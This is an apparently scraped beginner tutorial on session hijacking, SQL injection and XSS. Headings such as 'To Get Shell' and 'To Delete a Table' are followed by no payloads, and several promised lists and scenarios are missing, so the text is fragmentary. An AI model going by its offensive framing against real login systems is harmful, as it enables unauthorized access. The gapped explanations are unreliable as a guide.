Before Understanding Session Hijacking, first of all we need to understand What is Session?
Session is semi-permanent interactive information interchange, also known as a dialogue, a conversation or a meeting, between two or more communicating devices, or between a computer and user.
Sessions are generally needed to ease authenticated communication between two or more parties. All the nodes, are not required to authenticate for every activity or action, because of the session which exists.
TCP Hijacking is oldest type of session hijacking. TCP session hijacking actually deals with the successful prediction of the Initial sequence numbers that gets exchanged between two host. A client and the server.
Sequence Numbers are exchanged during TCP Three way handshaking.
So, If attackers manage to predict the initial sequence number then they can actually send the last ACK data packet to the server, spoofing as original Host. then they can hijack the TCP Connection.
Now before predicting a initial sequence number of a TCP three way handshaking, attackers need to be in between the client and server to successfully hijack the TCP connection, for which attacker can actually use these three techniques.
SQL which stands for Structured Query Language, is a database language designed to manage data in Relational Database Management Systems (RDBMS).
1. The User will Provide Input to the Web Application.
2. The Web Application will accept the Data from the User and Process it in the SQL Query as per the Web Script.
3. The Web Server will generate an Output for the User, depending upon the Script.
For Example, We enter our Login Credentials in a Login Form and Press Submit. The Server takes the Details and Checks it against its User Database. If Authenticated, you are Taken to the Desired Page.
During SQL Injection, the User will submit Malicious Input which would force the Query (which is run by the Login Script in Backend) to perform an undesired Action.
Unauthorized Use of Web Application. SQL Injection can commonly result in bypassing of User Authentication
Apart from this, one can also:
To Bypass Authentication, use one of the following Query in the User Input:
To Guess Field Name:
On the Basis of the Error Produced, one can establish if the Field exists or not.
To Guess Table Name:
To Delete a Table:
To Write a File:
To Get Shell:
Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered.
DOM Based (Type 0) XSS Vulnerabilities
Non-Persistent (Type 1) XSS Vulnerabilities
Generally, when combines with a Social Engineering Attack, it can cause Security Issues over User Data.
In a Sample Scenario, Consider this:
Persistent (Type 2) XSS Vulnerabilities
Consider a Scenario:
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.